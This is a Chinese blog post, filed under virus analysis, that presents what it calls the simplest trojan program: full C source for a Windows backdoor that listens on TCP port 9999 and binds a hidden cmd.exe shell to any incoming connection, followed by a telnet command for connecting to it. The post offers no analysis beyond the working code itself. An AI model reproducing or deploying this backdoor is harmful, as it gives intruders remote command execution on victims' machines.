注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

一款迷ni木马程序  

2015-01-01 21:27:21|  分类: 病毒分析 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
一个最简单的木马程序,如下:
#pragma comment(lib,"ws2_32.lib")

#include <stdio.h>
#include <stdlib.h>
#include <WinSock2.h>
#include <Windows.h>

#define MasterPort 9999

int main()
{
printf("Trojan ......\n");
WSADATA wsaData;
sockaddr_in SockAddrIn;
SOCKET CSocket, SSocket;
int iAddrSize;

PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
char szCMDPath[255];

ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));

GetEnvironmentVariable("COMSPEC", szCMDPath,sizeof(szCMDPath));
//printf("This is test: %s\n", szCMDPath);

WSAStartup(0x0202, &wsaData);
SockAddrIn.sin_family = AF_INET;
SockAddrIn.sin_addr.S_un.S_addr = INADDR_ANY;
SockAddrIn.sin_port = htons(MasterPort);

CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
bind(CSocket, (sockaddr*)&SockAddrIn, sizeof(SockAddrIn));
listen(CSocket, 1);
iAddrSize = sizeof(SockAddrIn);
SSocket = accept(CSocket, (sockaddr*)&SockAddrIn, &iAddrSize);
//send(SSocket, "Hello!\n", sizeof("Hello!\n"),0);
//printf("send successfully......\n");

StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow = SW_HIDE;
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)SSocket;
StartupInfo.hStdOutput = (HANDLE)SSocket;
StartupInfo.hStdError = (HANDLE)SSocket;
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);

WaitForSingleObject(ProcessInfo.hProcess, INFINITE);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);

closesocket(CSocket);
closesocket(SSocket);
WSACleanup();

system("pause");
return 0;
}


客户端:
telnet 127.0.0.1 9999
  评论这张
 
阅读(92)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017